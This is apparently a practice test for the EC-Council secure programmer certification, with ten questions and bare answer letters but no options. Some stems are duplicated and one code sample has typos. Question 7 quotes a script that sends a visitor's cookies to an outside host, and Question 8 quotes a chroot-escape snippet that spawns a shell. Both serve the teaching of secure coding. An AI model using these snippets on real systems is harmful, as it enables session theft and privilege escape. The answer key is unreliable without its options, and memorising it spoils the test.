EC-COUNCIL EC-Council Certified Secure Programmer v2 (312-92) Free Practice Test
Question 1
Fred is planning on using the windows socket application ClientApp.exe program to create a client-side application that his employees will use. This program will access backend programs from two different remote sites over WAN connections. If Fred does not make any modifications to the ClientApp.exe default settings, what port must he have the network engineer open in order for the application to communicate?
Correct Answer: B
Question 2
Peter is writing a program that has a GUI front-end and uses a MS SQL database as a backend. Peter's application will repeatedly update and call upon specific tables in the database on a regular basis. Peter wants to make sure that his program always has the ability to update the database and that no other calls or updates can touch the database tables used at the same time. How could Peter accomplish this in his application?
Correct Answer: B
Question 3
What testing methodology does not require any knowledge of the internal design or code of a software application?
Correct Answer: D
Question 4
Which Linux command will securely delete a file by overwriting its contents?
Correct Answer: D
Question 5
What type of authentication is used in the following Pocket SOAP code?
Dim Envelope
Dim HTTP
Set Envelope = CreateObject("PocketSOAP.Envelope.2")
Set HTTP = CreateObject("PocketSOAP.HTTPTransport.2)
Envelope.SetMethod "GetSome", "http://www.mysite.org/message/"
Emvelope.Parameters.Create "SomeParameter", "SomeValue"
HTTP.SOAPAction = "http://www.mysite.org/action/Service.GetSome"
HTTP.Authentication "Username", "Password"
HTTP.Send http://www.mysite.org/webservice.WDSL",Envelope.Serialize
Envelope.Parse HTTP
MsgBox "Result: " & Envelope.Parameters.Item(0).Value
Dim Envelope
Dim HTTP
Set Envelope = CreateObject("PocketSOAP.Envelope.2")
Set HTTP = CreateObject("PocketSOAP.HTTPTransport.2)
Envelope.SetMethod "GetSome", "http://www.mysite.org/message/"
Emvelope.Parameters.Create "SomeParameter", "SomeValue"
HTTP.SOAPAction = "http://www.mysite.org/action/Service.GetSome"
HTTP.Authentication "Username", "Password"
HTTP.Send http://www.mysite.org/webservice.WDSL",Envelope.Serialize
Envelope.Parse HTTP
MsgBox "Result: " & Envelope.Parameters.Item(0).Value
Correct Answer: C
Question 6
William is the lead programmer for Gummerson, Inc., a software company located in San Francisco. Gummerson is looked upon as one of the leading software development companies for medical and health related applications. William believes that his company is so successful because they believe in involving the user or client in the design and development of the programs. What software development methodology does Gunnerson, Inc. use when creating applications for clients?
Correct Answer: D
Question 7
Gerald is a web security consultant for Protectors International. Gerald's main responsibility is to search the Internet for malicious and deceitful sites that the public should be aware of.
Gerald was tipped off about a particular site and is now looking over its source code in a protected environment. Gerald finds the following snippet particularly interesting. What has Gerald stumbled upon?
<script>
document.write('<form name=hack method=post action="http://
scarysite.com/getit.php">
<input type=hidden name=sid value="' + escape(document.cookie) +
'">');
document.hack.submit();
</script>
Gerald was tipped off about a particular site and is now looking over its source code in a protected environment. Gerald finds the following snippet particularly interesting. What has Gerald stumbled upon?
<script>
document.write('<form name=hack method=post action="http://
scarysite.com/getit.php">
<input type=hidden name=sid value="' + escape(document.cookie) +
'">');
document.hack.submit();
</script>
Correct Answer: B
Question 8
What is the following shellcode trying to accomplish?
int main(void) {
mkdir("A");
chdir("A");
chroot("..//..//..//..//..//..//..//..//");
system("/bin/sh")
int main(void) {
mkdir("A");
chdir("A");
chroot("..//..//..//..//..//..//..//..//");
system("/bin/sh")
Correct Answer: D
Question 9
Jonathan is creating an XML document and needs to sign data streams. In his code, Jonathan creates a signature node that is contained within the signed datastream. What type of signature signing has Jonathan employed here?
Correct Answer: A
Question 10
Kenny is the CIO for Fredrickson Entertainment, a gaming software company in Omaha.
The developers in Kenny's company have just finished creating a 3D first person shooter game that will be released to the market within the next couple of months. Kenny is trying to decide what type of license or activation code structure they should use for the game to prevent piracy and protect their product. Kenny decides to go with an approach that will allow each sold copy to be activated online up to five times because he knows his users might have multiple PCs or might need to reinstall the product at some point.
What type of activation policy has Kenny decided to go with?
The developers in Kenny's company have just finished creating a 3D first person shooter game that will be released to the market within the next couple of months. Kenny is trying to decide what type of license or activation code structure they should use for the game to prevent piracy and protect their product. Kenny decides to go with an approach that will allow each sold copy to be activated online up to five times because he knows his users might have multiple PCs or might need to reinstall the product at some point.
What type of activation policy has Kenny decided to go with?
Correct Answer: C